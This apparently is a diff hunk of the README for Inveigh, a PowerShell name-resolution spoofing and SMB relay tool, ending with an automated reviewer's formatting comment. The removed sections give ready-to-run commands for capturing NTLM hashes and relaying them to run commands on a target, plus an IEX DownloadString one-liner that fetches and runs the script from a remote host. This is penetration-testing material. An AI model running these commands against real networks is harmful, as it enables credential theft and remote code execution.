-* __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes
-* __Watch-Inveigh__ - Enable real time console output
* __Clear-Inveigh__ - Clear Inveigh data from memory
+* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames
* __Stop-Inveigh__ - Stop all running Inveigh functions
+* __Watch-Inveigh__ - Enable real time console output
-## Miscellaneous Notes
-* The local LLMNR/NBNS services do not need to be disabled on the host system.
-* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
-* Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
-* Ensure that any needed LMMNR,NBNS,SMB,HTTP,HTTPS ports are open within any local firewall on the host system.
-* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
-
-## System Requirements
-* Tested minimums are PowerShell 2.0 and .NET 3.5
-
-## Usage
-* To import with Import-Module:
- Import-Module ./Inveigh.psd1
-
-* To import using dot source method:
- . ./Inveigh.ps1
- . ./Inveigh-BruteForce.ps1
- . ./Inveigh-Relay.ps1
-
-* To load into memory using Invoke-Expression:
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
-
-## Examples
-* To execute with default settings:
- Invoke-Inveigh
-
-* To load and execute with one line:
- Import-Module ./Inveigh.ps1;Invoke-Inveigh
-
-* To execute with parameters (Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters):
- Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path'
-
-* To execute with SMB relay enabled through Invoke-Inveigh:
- Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target"
-
-* To execute SMB relay with only Invoke-InveighRelay:
- Invoke-InveighRelay -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target"
-
-* To execute Inveigh-BruteForce against a target:
- Invoke-InveighRelay -SpooferTarget 'remote or local target IP'
-
-## Included In
-* PowerShell Empire - https://github.com/PowerShellEmpire/Empire
-* PS>Attack - https://github.com/jaredhaight/psattack
-* p0wnedShell - https://github.com/Cn33liz/p0wnedShell
-
-## Special Thanks
-* Anyone that posted .NET packet sniffing examples.
-* Responder - https://github.com/SpiderLabs/Responder
-* Impacket - https://github.com/CoreSecurity/impacket
-
-## Screenshots
-Invoke-Inveigh execution with real time console and file output enabled
-![inveighv1](https://cloud.githubusercontent.com/assets/5897462/12239354/4bb8a01a-b856-11e5-8a1e-5c0ebbb1ff35.PNG)
-
-Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2
-![inveigh2](https://cloud.githubusercontent.com/assets/5897462/10326313/abde41d8-6c67-11e5-91b8-0c55271ba326.png)
-
-HTTP to SMB Relay
-![inveigh3](https://cloud.githubusercontent.com/assets/5897462/10326314/b2de540a-6c67-11e5-8627-fe5d27018dc3.png)
-
-Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive PowerShell Session payloads
-![inveigh5](https://cloud.githubusercontent.com/assets/5897462/10354363/53e73784-6d2d-11e5-8509-9bb7f3feab88.png)
+##### Screenshot:
+![inveigh-support](https://cloud.githubusercontent.com/assets/5897462/18420531/b1858e2e-7842-11e6-9f03-0e86ee704211.png)
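Review bot: the added `+##### Notes:` and `+##### Screenshot:` headings sit directly under the last list item with no blank line, unlike the blank line this hunk keeps before `### Support Functions`; add a blank line before each so the heading does not attach to the preceding list. The new `__Get-Inveigh__` parameter list also mixes `ClearText` with `CleartextUnique`; pick one spelling so the documented parameter names match the function. Finally, this hunk removes the System Requirements, Usage, Examples, Included In and Special Thanks sections without re-adding them here; confirm they were relocated in the earlier hunk of this README (the `+237` offset suggests content moved up) rather than dropped.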